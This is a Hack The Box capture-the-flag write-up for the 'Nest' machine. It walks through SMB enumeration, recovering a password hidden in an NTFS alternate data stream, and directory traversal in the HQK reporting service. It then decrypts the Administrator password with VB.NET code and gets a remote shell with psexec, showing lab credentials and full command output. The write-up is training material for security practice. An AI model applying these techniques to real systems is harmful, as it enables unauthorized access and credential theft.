-rwxr-xr-x 1 root root 6451 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug 8 2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: './users/Administrator': Permission denied
-rwxr-xr-x 1 root root 17408 Aug 7 2019 './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
-rwxr-xr-x 1 root root 0 Aug 8 2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 249 Aug 8 2019 './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
-rwxr-xr-x 1 root root 32 Aug 8 2019 ./users/C.Smith/user.txt
find: './users/L.Frost': Permission denied
find: './users/R.Thompson': Permission denied
find: './users/TempUser': Permission denied
User flag
u505@naos:~/HTB/Machines/Nest/mnt$ cat ./users/C.Smith/user.txt
<USER_FLAG>
Other important files
There is an executable file, HqkLdap.exe. It is a .NET assembly.
u505@naos:~/HTB/Machines/Nest/mnt$ file './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
./users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
HQK Reporting is related to the service found on port 4386: the backup configuration names that port and the query directory.
u505@naos:~/HTB/Machines/Nest/mnt$ cat './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
The last file, Debug Mode Password.txt, is empty.
u505@naos:~/HTB/Machines/Nest/mnt$ ls -l './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 0 Aug 8 2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
But when checked with smbclient, an alternate data stream (ADS) named Password appears on the file.
u505@naos:~/HTB/Machines/Nest$ smbclient \\\\10.10.10.178\\Users -U c.Smith
Enter WORKGROUP\c.Smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

		10485247 blocks of size 4096. 6545619 blocks available
smb: \> cd C.Smith
smb: \C.Smith\> cd "HQK Reporting"
smb: \C.Smith\HQK Reporting\> dir
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

		10485247 blocks of size 4096. 6545619 blocks available
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> quit
The debug password was hidden in the alternate data stream; a plain directory listing or ls -l only shows the empty unnamed stream.
u505@naos:~/HTB/Machines/Nest$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w
Root flag
Disassemble HqkLdap.exe
With dnSpy we can decompile the Intermediate Language (IL); I used a Windows box to run dnSpy.
There is a function DS that decrypts a string by calling the function RD with a fixed set of parameters.
The function RD is identical to the Decrypt function found previously in Utils.vb, but this time the parameters have changed:
* PassPhrase: 667912
* Salt: 1313Rf99
* 3 password iterations
* Init vector: 1L1SA61493DRV53Z
* The key length is still 256 bits.
Service on port 4386
After playing with the service, we discover that the command LIST lists the current directory (like ls), SETDIR changes the current directory (".." is accepted, so it is possible to leave the configured query directory), and in debug mode the command SHOWQUERY shows the content of a file.
u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

>setdir ldap

Current directory set to ldap
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: ldap
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>quit
Was it something I said?
Connection closed by foreign host.
In the LDAP directory, we find the same executable that we disassembled before, and the LDAP configuration file Ldap.conf, which contains the encrypted Administrator password.
Decrypt administrator password
With the help of our previous program, we can decrypt this string too: we only need to update the encryption parameters and the encrypted password.
u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            ' Previous parameters, replaced by the ones recovered from HqkLdap.exe
            'Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
            Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        End If
    End Function

    ' AES-CBC decryption: the key is derived from the passphrase and salt with
    ' Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1), the IV is the initVector as ASCII bytes.
    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

Module Program
    Sub Main(args As String())
        'Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        Console.WriteLine(Utils.DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="))
    End Sub
End Module
Running the program provides us with the clear password.
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
XtH4nkS4Pl4y1nGX
Root flag
With crackmapexec, we can confirm that the password is the Administrator password.
u505@naos:~/HTB/Machines/Nest/VBu505$ sudo crackmapexec smb 10.10.10.178/32 -u administrator -p XtH4nkS4Pl4y1nGX --shares
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\administrator:XtH4nkS4Pl4y1nGX (Pwn3d!)
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark
SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$ READ,WRITE Default share
SMB 10.10.10.178 445 HTB-NEST Data READ,WRITE
SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$ READ,WRITE
SMB 10.10.10.178 445 HTB-NEST Users READ,WRITE
With psexec.py, we can obtain a shell on the machine.
u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/psexec.py administrator@nest
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on nest.....
[*] Found writable share ADMIN$
[*] Uploading file BKaLscZa.exe
[*] Opening SVCManager on nest.....
[*] Creating service XuLc on nest.....
[*] Starting service XuLc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd c:\Users\administrator\Desktop
c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 2C6F-6A14

 Directory of c:\Users\Administrator\Desktop

01/26/2020  07:20 AM    <DIR>          .
01/26/2020  07:20 AM    <DIR>          ..
08/05/2019  10:27 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  26,811,756,544 bytes free

c:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>
C:\Windows\system32>systeminfo
Host Name:                 HTB-NEST
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00477-179-0000007-84361
Original Install Date:     8/5/2019, 9:22:30 PM
System Boot Time:          12/27/2020, 5:15:00 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,654 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,679 MB
Virtual Memory: In Use:    416 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 68 Hotfix(s) Installed.
                           [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB977239 [07]: KB981390 [08]: KB2305420 [09]: KB2393802 [10]: KB2425227 [11]: KB2484033 [12]: KB2488113 [13]: KB2505438 [14]: KB2506014 [15]: KB2506212 [16]: KB2506928 [17]: KB2509553 [18]: KB2511250 [19]: KB2511455 [20]: KB2522422 [21]: KB2544893 [22]: KB2545698 [23]: KB2547666 [24]: KB2552343 [25]: KB2560656 [26]: KB2563227 [27]: KB2564958 [28]: KB2570947 [29]: KB2585542 [30]: KB2598845 [31]: KB2603229 [32]: KB2607047 [33]: KB2608658 [34]: KB2618451 [35]: KB2620704 [36]: KB2621440 [37]: KB2631813 [38]: KB2640148 [39]: KB2643719 [40]: KB2653956 [41]: KB2654428 [42]: KB2660075 [43]: KB2667402 [44]: KB2676562 [45]: KB2685811 [46]: KB2685813 [47]: KB2685939 [48]: KB2690533 [49]: KB2698365 [50]: KB2705219 [51]: KB2709630 [52]: KB2712808 [53]: KB2718704 [54]: KB2726535 [55]: KB2729094 [56]: KB2741355 [57]: KB2758857 [58]: KB2761217 [59]: KB2765809 [60]: KB2770660 [61]: KB2791765 [62]: KB2807986 [63]: KB2813347 [64]: KB2840149 [65]: KB4012212 [66]: KB958488 [67]: KB976902 [68]: KB976932
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.178
                                 [02]: fe80::9da7:5b52:920d:5876
                                 [03]: dead:beef::9da7:5b52:920d:5876

c:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on nest.....
[*] Stopping service XuLc.....
[*] Removing service XuLc.....
[*] Removing file BKaLscZa.exe.....
Daniel Simao 08:43, 27 December 2020 (EST)